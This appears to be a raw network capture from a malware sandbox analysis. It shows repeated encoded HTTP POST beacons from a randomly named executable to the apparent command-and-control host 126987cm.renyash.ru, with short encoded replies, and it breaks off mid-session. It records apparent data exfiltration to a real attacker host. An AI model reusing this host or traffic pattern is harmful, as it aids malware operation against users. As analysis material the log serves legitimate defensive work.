                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                28192.168.2.449769172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:48.297028065 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:48.655471087 CET1072OUTData Raw: 51 53 5e 53 53 41 5c 54 5d 56 5b 57 54 58 51 58 58 50 58 5f 5b 56 57 40 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QS^SSA\T]V[WTXQXXPX_[VW@VYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_$42!]"'^'-58;V?7;W67% :)B>-#'*!^&%X*7
                                                                                                                                Jan 1, 2025 21:47:48.754667044 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:49.017904997 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BPMGlA5C8TrveD0tt5F2C1reMVvgojZKrbeZvody0LlarIewm6Ax5dPInTWmw3cd0Co5iZaaiCAWyI6hNv7ABHH9YTcKeKsOcr7UEMpa%2FZYmram3lZSXlvYnGeUEXuhy3b0%2BvxQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dd96afbc470-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4415&min_rtt=2258&rtt_var=5161&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=74810&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                29192.168.2.449770172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:49.141230106 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:49.501610041 CET1072OUTData Raw: 54 53 5b 5f 53 44 59 53 5d 56 5b 57 54 59 51 58 58 50 58 5c 5b 5e 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[_SDYS]V[WTYQXXPX\[^WCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!32'X !.5-?_$-_!;(+06& T00*[)(>7&!^&%X*3
                                                                                                                                Jan 1, 2025 21:47:49.589566946 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:49.861120939 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weVQ57YvXfPZ4YNsUXIYcEesAjoCBW0fOMRWAqWdsI8lbSl2XmmewFcJKplLqDMKvh1pSB3qWXUxKMEuDXztN1BTqkJNmtR0F5hD61D3HMPWnA%2BEcgHqwfS6vFiI%2FkJ%2BnB2Mc7NM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ddea86c43a5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2199&min_rtt=1749&rtt_var=1556&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=272897&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                30192.168.2.449771172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:50.042603970 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:50.389770031 CET1072OUTData Raw: 54 56 5b 57 56 4b 5c 56 5d 56 5b 57 54 5d 51 53 58 51 58 5a 5b 5f 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[WVK\V]V[WT]QSXQXZ[_WDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3 7![5>$'+#+'S(B;P#%,30)%%>=;&*!^&%X*#
                                                                                                                                Jan 1, 2025 21:47:50.492729902 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:50.771249056 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:50 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLE1WUMfjPWtb6ACKDhkHqz9XP17fTsVGWagcIbEUAZWznfoubm%2FmxG3SDf7Op621qbjrEg4o95SX0EeFFmqUbDL%2Fu80Tf2OmVqhghph2IooAt%2F7i944arxd640u%2FCWVOsdfzT1m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55de44a6f4406-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3412&min_rtt=1559&rtt_var=4290&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=89116&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                31192.168.2.449773172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:50.891716957 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                32192.168.2.449774172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:50.990123034 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:51.342860937 CET1788OUTData Raw: 51 52 5e 50 53 44 59 50 5d 56 5b 57 54 5a 51 53 58 50 58 51 5b 53 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QR^PSDYP]V[WTZQSXPXQ[SWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!&1,419\638!;U?;P6%$02=%:?-([&:!^&%X*?
                                                                                                                                Jan 1, 2025 21:47:51.499819040 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:51.764488935 CET959INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thtGpKwoJUB%2FvU%2FYxULUGFoElmm0MD7enCYQW0QOSkuj9CJ1mryglkaiOt%2Bp7dbTj6FalqdFT%2FOtDV%2B5R1FnQXhKgSe%2FuUK85XfynWAN9mzeq4v4gnyl3D3upH818BI4FrDmNFFf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dea9fb2424c-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4517&min_rtt=1608&rtt_var=6421&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=58674&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0f 28 40 2c 0a 34 22 0c 0d 3d 2b 2f 11 24 32 32 5a 26 55 22 1a 2b 5e 23 1a 3c 59 34 16 32 12 30 5d 30 14 31 57 28 0c 3f 03 3d 1c 20 5c 05 1b 3a 07 26 29 2f 5e 25 28 3e 0f 29 33 2c 5d 21 2f 39 01 28 33 24 51 23 06 00 00 32 16 35 1d 26 2a 35 0e 2b 2f 3c 04 29 1e 2c 08 31 2d 2a 51 0f 16 38 57 3d 0e 25 02 3d 2c 30 5b 27 0f 28 1c 21 43 31 55 31 2b 2f 1d 33 04 2e 59 29 3e 19 1b 36 23 2b 11 26 02 31 07 26 3d 23 18 3a 10 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"(@,4"=+/$22Z&U"+^#<Y420]01W(?= \:&)/^%(>)3,]!/9(3$Q#25&*5+/<),1-*Q8W=%=,0['(!C1U1+/3.Y)>6#+&1&=#:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.449775172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:51.112231016 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:51.467834949 CET1072OUTData Raw: 54 51 5b 54 56 45 5c 52 5d 56 5b 57 54 5f 51 5e 58 50 58 5b 5b 5e 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[TVE\R]V[WT_Q^XPX[[^WAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$ 7!!!=#'8"<+#Q!%(R03.Z(6=D+7%:!^&%X*+
                                                                                                                                Jan 1, 2025 21:47:51.587651968 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:51.850878000 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evVvjlPweotxSg5hMSEw%2Bo7KRwKQ2SJuo8FKgGE5AKML55a1swWOBpYjxgSKB904De8EOsRj2MAIXRxMbkquK8gpxMmix94XAKB8jFTjUCWv9XFHywTzA1i3OKCXUb2nZLLwSNPs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55deb2fc67cb1-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3291&min_rtt=1821&rtt_var=3624&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=107455&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                34192.168.2.449776172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:51.969460964 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:52.327572107 CET1072OUTData Raw: 54 56 5b 56 56 4b 59 53 5d 56 5b 57 54 59 51 53 58 5c 58 5e 5b 51 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[VVKYS]V[WTYQSX\X^[QWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_3;^7"X -+3$Z5;(?7$!5,V$2Y)6<%!^&%X*3
                                                                                                                                Jan 1, 2025 21:47:52.421494961 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:52.692080021 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRX3Cp%2FrVhqZnvVRaHxw39gzi40axkeDuYJmLh%2BCSxYqbE5gC13Ghsb19RsyoqJdc%2BCeXcqWpZgxUSlNgNoFrYquy7667u6Sen3lZQtIlI7EDcU4hWRhOgLlIV29m7jlRRttI%2FdA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55df05eb64263-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4666&min_rtt=1728&rtt_var=6525&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=57853&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                35192.168.2.449777172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:52.958625078 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:53.314246893 CET1072OUTData Raw: 54 54 5b 5f 56 43 59 57 5d 56 5b 57 54 58 51 5d 58 5d 58 5e 5b 5e 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[_VCYW]V[WTXQ]X]X^[^WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_31 T%X! $>(_"8'($#"6 0#9>&>=<^2*!^&%X*7
                                                                                                                                Jan 1, 2025 21:47:53.430330992 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:53.601663113 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WC%2F5qIyhNuwnEdI1l5qpUnPjcKajtbSmHmczX%2Fu1PFUXA5qabDWfbBjcEjFjmpBGjudhnIkef8C3yfhcLnUQa2BKgaPbHwzBhm2W0ssalViVVeni7IOvwSkANX6ceAQcwS%2B977V5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55df69d404326-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3915&min_rtt=1585&rtt_var=5254&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=72184&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                36192.168.2.449778172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:53.862956047 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:54.217885017 CET1072OUTData Raw: 54 56 5e 54 56 40 59 5f 5d 56 5b 57 54 5d 51 5e 58 51 58 5b 5b 5e 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV^TV@Y_]V[WT]Q^XQX[[^WIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z'1< !9]58$-068#?3"5,U33-)&5C?>(%*!^&%X*#
                                                                                                                                Jan 1, 2025 21:47:54.307132006 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:54.575320959 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FMNqCHSOFSdp1jbR8HXs1D8u5%2F6lpEWc4%2FghheNl09CYDWqiIYBqSu0SduC9kB6KHFMWUbmuJQ65XcBmyyIvWpR5Y%2FtBbdzq%2FdH8Cgx4Nh%2FFLigx1mAk4ZpatyA4lulEFiWmzqO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dfc1bb90f46-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1679&rtt_var=1310&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=331742&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                37192.168.2.449780172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:54.703042984 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:55.062002897 CET1072OUTData Raw: 54 52 5e 54 53 44 5c 55 5d 56 5b 57 54 5b 51 5d 58 57 58 5a 5b 57 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
